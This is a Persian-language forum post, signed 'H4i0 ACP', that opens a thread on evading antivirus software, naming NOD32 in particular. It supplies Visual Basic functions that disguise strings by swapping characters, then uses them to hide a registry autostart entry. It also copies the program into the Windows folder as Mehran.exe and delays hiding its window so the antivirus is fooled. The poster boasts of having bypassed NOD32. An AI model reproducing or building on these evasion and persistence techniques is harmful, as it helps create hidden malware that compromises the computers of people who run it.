روش های پیشنهادی در مورد دوز زدن آنتی ویروس ها
سلام .
تمامی دوستانی که به ویروس و آنتی ویروس نویسی علاقه دارند می تونن توی این تاپیک شرکت کنند .
موضوع تاپیک : روش های پیشنهادی در مورد دوز زدن آنتی ویروس ها
به عنوان اولین و کارآمد ترین روش من بحث رو باز می کنم :
توابع زیر رو توی برنامه تعریف کنید (Coder و Decoder )
Public Function DECODER(SS As String) As String
Dim Str As String
Dim US As String
For i = 1 To Len(SS)
Str = Mid(SS, i, 1)
Select Case LCase(Str)
Case "*": US = US & "W"
Case "@": US = US & "I"
Case "!": US = US & "N"
Case "^": US = US & "D"
Case "%": US = US & "O"
Case "$": US = US & "S"
Case "~": US = US & "Y"
Case "`": US = US & "H"
Case "|": US = US & "A"
Case "#": US = US & "C"
Case "?": US = US & "T"
Case "'": US = US & "E"
Case ",": US = US & "M"
Case ";": US = US & "K"
Case Else: US = US & UCase(Str)
End Select
Next i
DECODER = US
End Function
Public Function CODER(SS As String) As String
Dim Str As String
Dim US As String
For i = 1 To Len(SS)
Str = Mid(SS, i, 1)
Select Case LCase(Str)
Case "w": US = US & "*"
Case "i": US = US & "@"
Case "n": US = US & "!"
Case "d": US = US & "^"
Case "o": US = US & "%"
Case "s": US = US & "$"
Case "y": US = US & "~"
Case "h": US = US & "`"
Case "a": US = US & "|"
Case "c": US = US & "#"
Case "t": US = US & "?"
Case "e": US = US & "'"
Case "m": US = US & ","
Case "k": US = US & ";"
Case Else: US = US & UCase(Str)
End Select
Next i
CODER = US
End Function
حالا برای اینکه NOD32 عزیز و یا هر آنتی ویروس دیگه ای رو دور بزنیم میایم مسیر ها رو به صورت کد شده می نویسیم و توسط تابع Decoder اونها رو برای استفاده در برنامه Decode می کنیم . به عبارت ساده تر : متونی مثل مسیر های رجیستری که توسط آنتی ویروس ها شناخته میشن رو در زمان طراحی به صورت کد شده می نویسیم (استفاده از تابع Coder) بعد برای استفاده در برنامه اونها Decode می کنیم . یعنی فقط در زمان اجرا است که محتوای متون تغییر می کنه .
پس :
برای ایجاد یک مقدار Autostartup در رجیستری می تونیم اینطوری عمل کنیم :
Set reg = CreateObject(CODER("*$#R@P?.$`'LL"))
reg.RegWrite CODER("`;'~_#URR'!?_U$'R\$%F?*|R'\,@#R%$%F?\*@!^%* $\#URR'!?V'R$@%!\RU!\"), App.Path & "\" & App.EXEName & ".exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\WINDOWS\Mehran.exe"
و اما مکمل را حل بالایی اینه که هیچ وقت دستور Me.Hide و یا App.TaskVisible = False رو توی Form_Load ننویسد . پیشنهاد من اینه که دستورات ذکر شده تویه Timer مثلاً با Interval 100 بنویسید تا باز هم NOD32 عزیزمون یه کمی بیشتر فریب بخوره .
منتظر نظرات و پیشنهادات دوستان عزیز هستم .
من تونستم NOD32 رو دور بزنم !!!
نوشته شده توسط H4i0 ACP
